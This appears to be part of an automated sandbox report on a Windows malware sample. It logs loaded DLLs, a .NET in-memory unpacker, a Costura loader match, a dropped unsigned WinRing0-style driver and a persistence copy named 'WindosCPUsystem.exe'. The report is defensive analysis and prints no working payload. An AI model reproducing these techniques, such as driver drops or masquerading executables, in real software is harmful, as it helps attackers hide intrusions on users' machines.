Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.exe

Static file information: File size 5879808 > 1048576

Source: file.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x59b000

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: _.Pdb=function(a,b){return"requestIdleCallback"in window?window.requestIdleCallback(a,b):window.setTimeout(function(){var c=Date.now();a({didTimeout:!1,timeRemaining:function(){return Math.max(0,10-(Date.now()-c))}})},typeof(b==null?void 0:b.timeout)==="number"&&b.timeout>=0?Math.min(b.timeout,50):50)};_.Qdb=function(a){"cancelIdleCallback"in window&&window.cancelIdleCallback(a);window.clearTimeout(a)}; source: chromecache_125.12.dr, chromecache_115.12.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000000.00000002.3127265786.000001FBA7CF0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000000.00000002.3127265786.000001FBA7CF0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Windows\SYSTEM32\ntmarta.dllv4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dllGitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000000.00000002.2876558142.000001FBA7475000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: cvtres.exe, 00000007.00000003.2148391342.00000171D4680000.00000004.00000001.00020000.00000000.sdmp, cvtres.exe, 00000012.00000003.3332406842.000001FA08B00000.00000004.00000001.00020000.00000000.sdmp, orupcopicsyv.sys.7.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: file.exe, 00000000.00000002.2656930945.000001FBA6830000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: _.Ln(_.Df(_.E4a),_.pdb); source: chromecache_125.12.dr, chromecache_115.12.dr
Source:	Binary string: GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000000.00000002.2876558142.000001FBA7475000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: _.m.QK=function(){return!0};_.m.pushState=function(a,b,c){this.window.history.pushState(a,b,c);return Promise.resolve()};_.m.replaceState=function(a,b,c){this.window.history.replaceState(a,b,c);return Promise.resolve()};_.Rn(_.pdb,Whb); source: chromecache_125.12.dr, chromecache_115.12.dr
Source:	Binary string: protobuf-net.pdb source: file.exe, 00000000.00000002.2656930945.000001FBA6830000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: _.m.replaceState=function(){return _.uh("InternalHistory","replaceState")};_.Rn(B4a,Wbb);_.Xbb=_.Gya;var Ybb=_.Kr("fvjcPb",[_.Lr]);_.Zbb=_.Md("US1EU",[Ybb]);_.$bb=_.Md("BgyPPc",[aab]);_.acb=_.Md("UBGcdd",[cab]);_.bcb=_.Md("eSFC5c");_.ccb=_.Md("B6b85");_.dcb=_.Md("pPxdAd");_.ecb=_.Md("TPCh7b");_.fcb=_.Md("NsiCRb");_.gcb=_.Md("BkiHtd");_.hcb=_.Md("K6ZEbf");_.icb=_.Md("TwdwWc",[]);_.jcb=_.Md("C0JoAb");_.kcb=_.Md("R8gt1");_.lcb=_.Md("yvBIXc");_.mcb=_.Md("hwYI4c",[jab]);_.ncb=_.Md("GTaNlc");_.ocb=_.Md("g6ZUob");_.pcb=_.Md("xkctJ");_.qcb=_.Md("vo3XM");_.rcb=_.Md("YgAQTc",[]);_.scb=_.Md("dbr2Mc");_.tcb=_.Md("krRYtf");_.ucb=_.Md("yWCO4c");_.vcb=_.Md("nVG46b");_.wcb=_.Md("gsJLOc",[]);_.xcb=_.Md("G29HYe",[o7a]);_.ycb=_.Md("h4qzS",[yab]);_.zcb=_.Md("YhmRB");_.Acb=_.Md("wciyUe",[]);_.Bcb=_.Md("Il1M4b");_.Ccb=_.Md("vWfZ8c",[Mab]);_.Dcb=_.Md("KRDUUb");_.Ecb=_.Md("hQ97re");_.Fcb=_.Md("iK2sb");_.Gcb=_.Md("soVptf");_.Hcb=_.Md("YeKaq");_.Icb=_.Md("Odo3Od");_.Jcb=_.Md("d7NTy");_.Kcb=_.Md("VQ7Yuf");_.Lcb=_.Md("M0VQbd");_.Mcb=_.Md("dhjipe",[cbb]);_.Ncb=_.Md("lBp0",[_.p$a]);_.Ocb=_.Md("CJRYDf",[_.Ir]);_.Pcb=_.Md("Z8Pdh");_.Qcb=_.Md("a70q7b");_.Rcb=_.Md("sfFTle",[kbb]);_.Scb=_.Md("nv86s",[nbb]);_.Tcb=_.Md("H1Onzb");_.Ucb=_.Md("QE3hvd");_.Vcb=_.Md("pPIvie",[_.Lr]);_.Wcb=_.Md("XwhUEb",[]);_.Xcb=_.Md("Kmnn6b");_.Ycb=_.Md("FrcyJe");_.Zcb=_.Md("xkjGve",[_.l$a]);_.$cb=_.Md("E2zlIf");var adb=_.Kr("uxcEeb",[_.Lr]);_.bdb=_.Md("LR64x",[adb]);_.cdb=_.Md("HZnJ6");_.ddb=_.Md("v74Vad");_.edb=_.Md("J2YIUd");_.fdb=_.Md("Y2XuT");_.gdb=_.Md("O1Rq3");_.hdb=_.Md("LHCaNd",[]);_.idb=_.Md("wKdTle",[_.Ir,_.N4a]);_.Ur=_.Md("Fdd8nd",[_.idb,_.Pr,_.xg]);_.jdb=_.Md("b6vcbb",[_.Gr]);_.kdb=_.Md("ttQ27",[_.dg,_.Do,_.Ur,_.idb]);_.ldb=_.Md("SGpRce",[_.dg,_.Ur,_.jdb,_.idb]);_.mdb=_.Md("lcrkwe",[_.dg,_.FYa,_.Do,_.idb,_.DYa,_.ldb,_.kdb]);_.ndb=_.Md("CpWC2d",[]);_.odb=_.Md("j9Yuyc",[]);_.pdb=_.Md("ofjVkb",[_.Mn]);_.qdb=_.Md("rlHKFc",[_.Er]);_.rdb=_.Md("sZnyj",[]);_.sdb=_.Md("jn2sGd",[_.Ir]);_.tdb=_.Md("p4LrCe",[]);_.udb=_.Md("k0T3Ub",[_.tdb]);var vdb=function(){};_.m=vdb.prototype;_.m.fD=function(a){return lya().fD(a)};_.m.setTimeout=function(a,b){var c=_.Jc.apply(2,arguments),d;return(d=lya()).setTimeout.apply(d,[a,b].concat(_.jd(c)))};_.m.setInterval=function(a,b){var c=_.Jc.apply(2,arguments),d;return(d=lya()).setInterval.apply(d,[a,b].concat(_.jd(c)))};_.m.clearTimeout=function(a){return lya().clearTimeout(a)};_.m.clearInterval=function(a){return lya().clearInterval(a)};_.Vr=new vdb; source: chromecache_125.12.dr, chromecache_115.12.dr
Source:	Binary string: cfb.prototype.requestIdleCallback=function(a,b){return _.Pdb(a,b)};cfb.prototype.cancelIdleCallback=function(a){_.Qdb(a)};_.An(_.XMa,new cfb); source: chromecache_125.12.dr, chromecache_115.12.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: file.exe, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: WindosCPUsystem.exe.0.dr, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.file.exe.1fba7cf0000.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.file.exe.1fba7cf0000.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.file.exe.1fba7cf0000.4.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.file.exe.1fba6830000.0.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.file.exe.1fba6830000.0.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.file.exe.1fba6830000.0.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.file.exe.1fba6830000.0.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.file.exe.1fba6830000.0.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Suspicious powershell command line found

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Process "https://google.com"
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Process "https://google.com"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Process "https://google.com"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Process "https://google.com"	Jump to behavior

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.file.exe.1fba74f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3638469569.0000020A5F69C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2912880514.000001FBA74F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2156184931.000001FB8E176000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindosCPUsystem.exe PID: 7280, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF848F4A09A pushfd ; ret	0_2_00007FF848F48011
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF848F400BD pushad ; iretd	0_2_00007FF848F400C1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF848F47FEA pushfd ; ret	0_2_00007FF848F48011
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848E1D2A5 pushad ; iretd	2_2_00007FF848E1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F300BD pushad ; iretd	2_2_00007FF848F300C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF849002316 push 8B485F92h; iretd	2_2_00007FF84900231B

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

File created: C:\Users\user\AppData\Local\Temp\orupcopicsyv.sys

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\orupcopicsyv.sys			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe			Jump to dropped file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
